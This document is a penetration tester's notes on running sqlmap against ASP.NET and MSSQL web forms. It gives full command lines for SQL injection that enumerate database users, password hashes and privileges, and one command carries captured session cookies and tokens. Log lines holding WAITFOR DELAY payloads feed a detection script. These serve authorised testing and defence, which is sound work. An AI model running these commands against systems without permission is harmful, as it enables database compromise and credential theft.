sqlmap

https://github.com/sqlmapproject/sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.


http://sqlmap.org/

Test case

http://localhost:8086/project/controller/action (POST) # C:\Users\clu\Downloads\sqlmapproject-sqlmap-d4d83b2\sqlmap.py -u http://localhost:8086/project/controller/action --data="search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30"

search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

%userprofile%\AppData\Local\sqlmap\output\localhost


.\sqlmap.py -u "https://host:port/pentest5/Campaign/GetMyCampaignList" --data="search=cam&periodStatus=0&__RequestVerificationToken=Hgf410s-TtjOD2MoQFIQ7ebBFik__POnfJ3kbJjQ8CLK1XyS-d3GyY6gd_UHCkQs0cSTKfVks77VnBz00" --cookie="WebSession=4bpzpunlduq5z0cpzf5ysmnr; __RequestVerificationToken=h5owU63jNKlDzObOGxW4h7caJMJfDsBnxcN2U9Vj_iHQku9mkd-OY4GSgjG_YGzfnWLMYg2; _ga=GA1.2.2054830099.1592468707; _gid=GA1.2.1238954720.1592468707; EdenredAdminSite=D9DB90E84FE929C84DB3C85E98AE621C5866E18BC145A78037513899550B3CA1039C2E89B3B8FED91E2EBFD0FB210E156C14C94C1E03112CCA2A81F5923D7421A7DF72E09A6551AA3485B380362E69ABA5B025EEA6AB8AFA712D19859EF6C2654C61C14F17A09F87F330BAC4D0440C87E74E778EF6E3D6D00E54CCE964C8B83995287D2CBA4576422C7FAD7B2C3D61A2CE47064FFCE860C8C589EA9E3F3994FDDB9F49C889E9A4380A57C6C2022503A54F15A98705F1F0A9DDC51795CDF614558C9C9D7D29085F27143F78D3EB8F3BC220DBA41BC257BFC941413B16DBA2A015318417A4F9261C105DE0703176DB969D48D89FC3C945258E415AAD9CB927EFB43B88F37DF0ACA143423F0B22CB6804E5931466F243A939474B3EA80AE7EF32959106A5B062C62C5FB26E63F8; EdenredParticipantSite=[elided]" --delay=0 --timeout=30 --retries=0 -p "search,periodStatus" --dbms="Microsoft SQL Server" --os=Windows --level=3 --risk=1 --threads=4 --time-sec=5 -b --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --batch --answers="crack=N,dict=N"


Option descriptions

https://github.com/sqlmapproject/sqlmap/wiki/Usage

-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
--data=DATA         Data string to be sent through POST (e.g. "id=1")

--cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--delay=DELAY       Delay in seconds between each HTTP request
--timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
--retries=RETRIES   Retries when the connection timeouts (default 3)
-p TESTPARAMETER    Testable parameter(s)

--dbms=DBMS         Force back-end DBMS to provided value
--os=OS             Force back-end DBMS operating system to provided value
--level=LEVEL       Level of tests to perform (1-5, default 1)
--risk=RISK         Risk of tests to perform (1-3, default 1)
--threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
--time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)

Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
 
-b, --banner        Retrieve DBMS banner
--current-user      Retrieve DBMS current user
--current-db        Retrieve DBMS current database
--hostname          Retrieve DBMS server hostname
--is-dba            Detect if the DBMS current user is DBA
--users             Enumerate DBMS users
--passwords         Enumerate DBMS users password hashes
--privileges        Enumerate DBMS users privileges
--roles             Enumerate DBMS users roles
--dbs               Enumerate DBMS databases

General:
    These options can be used to set some general working parameters
 
--batch             Never ask for user input, use the default behavior
--answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")

python.exe .\sqlmap.py -u "url" -f --banner --dbs --users

you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'


How to include multiple parameters in sqlmap POST request

You can just comma-separate the parameters you want to test.

In a GET request:

$ sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"

In a POST request:

$ sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST
...
[13:37:54] [WARNING] heuristic (basic) test shows that POST parameter 'a' might not be injectable
...
[13:37:59] [WARNING] heuristic (basic) test shows that POST parameter 'b' might not be injectable
...

Both examples would test the specified parameters a and b, but ignore c. (I also put them into double quotes which isn't actually necessary on Linux.)


Using sqlmap to exploit sql injection on ASP.NET and MSSQL 2012 

Example

python sqlmap.py --url="http://172.16.192.177" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4MjI5ODQ3ODhkZBhYr%2F8jkYBFxsKYA1YM1vPkqv5P%2FQj8KLA89PfymMCs&__EVENTVALIDATION=%2FwEdAARI43w1YsdHPRRITZvRBlVuY3plgk0YBAefRz3MyBlTcInkg%2Fut7Je4AtoEsfzZAOI85pbWlDO2hADfoPXD%2F5tdeqsY63Vwtk2NY2Vz7Ib0nYv%2BCWGPoIG6fglzvAXHKcM%3D&txtUserName=adinanta&txtPWD=p%40ssw0rd&btnSubmit=Submit" -p txtUserName --banner


python.exe .\sqlmap.py -u "url" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTAyMzk4NTIwZGQ+200GJqzXan3bvSRe1830yMwO1/5WyLofSgkPPFPCDA==&__VIEWSTATEGENERATOR=AD8ECECA&__EVENTVALIDATION=/wEdAAMGQ3/2wHYEvc5SFKrtaUE7ESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3cCneHHZYQNY/p/VeBR9o5AA9gjGBpbgF+4fPumKT6flA==&TextBox1=30&Button1=查询" --random-agent

[14:20:02] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS 
are you sure that you want to continue with further target testing? [Y/n]
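The runs above drive sqlmap with --random-agent, several threads and --time-sec=5 against an ASP.NET/MSSQL target sitting behind a WAF. As an added example that is not part of the original post, the Python routine below triages constructed, simplified IIS W3C-style log lines (the field layout, the thresholds and the sample lines are all assumptions) for the traces such a run leaves on the server side: sqlmap's default User-Agent, many distinct values for one parameter from one client, and responses delayed by about --time-sec seconds.

```python
# Added example (not from the original post): triage constructed, simplified
# IIS W3C-style log lines for traces of a sqlmap run: its default User-Agent
# (hidden by --random-agent), many distinct values for one parameter from one
# client, and responses delayed by time-based probing (--time-sec=5).
from collections import defaultdict
from urllib.parse import parse_qs

# Assumed field layout; IIS writes spaces inside the User-Agent as '+'.
FIELDS = ["date", "time", "method", "path", "query",
          "client_ip", "user_agent", "status", "time_taken_ms"]
LOG_LINES = """\
2020-06-18 10:00:01 GET /Campaign/GetMyCampaignList search=cam&periodStatus=0 203.0.113.9 sqlmap/1.4.6#stable+(http://sqlmap.org) 200 120
2020-06-18 10:00:01 GET /Campaign/GetMyCampaignList search=cam%27&periodStatus=0 203.0.113.9 sqlmap/1.4.6#stable+(http://sqlmap.org) 500 98
2020-06-18 10:00:02 GET /Campaign/GetMyCampaignList search=cam%27%20AND%201%3D1--&periodStatus=0 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 105
2020-06-18 10:00:03 GET /Campaign/GetMyCampaignList search=cam%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&periodStatus=0 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 5110
2020-06-18 10:00:09 GET /Campaign/GetMyCampaignList search=cam%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--&periodStatus=0 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 5098
2020-06-18 10:00:20 GET /Campaign/GetMyCampaignList search=cam&periodStatus=0 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0) 200 115
""".splitlines()

def parse_line(line):
    # Return a dict for one line, or None when the layout does not match.
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["time_taken_ms"] = int(rec["time_taken_ms"])
    rec["user_agent"] = rec["user_agent"].replace("+", " ")
    return rec

def triage(lines, distinct_threshold=5, slow_ms=5000, slow_threshold=2):
    # Return sorted (client_ip, path, reason) findings for the given lines.
    findings = set()
    values = defaultdict(lambda: defaultdict(set))  # (ip, path) -> param -> values
    slow = defaultdict(int)                         # (ip, path) -> slow responses
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["client_ip"], rec["path"])
        if rec["user_agent"].lower().startswith("sqlmap/"):
            findings.add(key + ("default sqlmap User-Agent",))
        for name, vals in parse_qs(rec["query"], keep_blank_values=True).items():
            values[key][name].update(vals)
        if rec["time_taken_ms"] >= slow_ms:
            slow[key] += 1
    for key, params in values.items():
        for name, vals in params.items():
            if len(vals) >= distinct_threshold:
                findings.add(key + (f"{len(vals)} distinct values for parameter '{name}'",))
    for key, n in slow.items():
        if n >= slow_threshold:
            findings.add(key + (f"{n} responses slower than {slow_ms} ms",))
    return sorted(findings)
```

On the sample lines triage(LOG_LINES) returns three findings, all for 203.0.113.9, and nothing for the single ordinary request from 198.51.100.7. The User-Agent check alone is defeated by --random-agent, which is why the value-count and timing heuristics are kept alongside it.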


Author: Chuck Lu    GitHub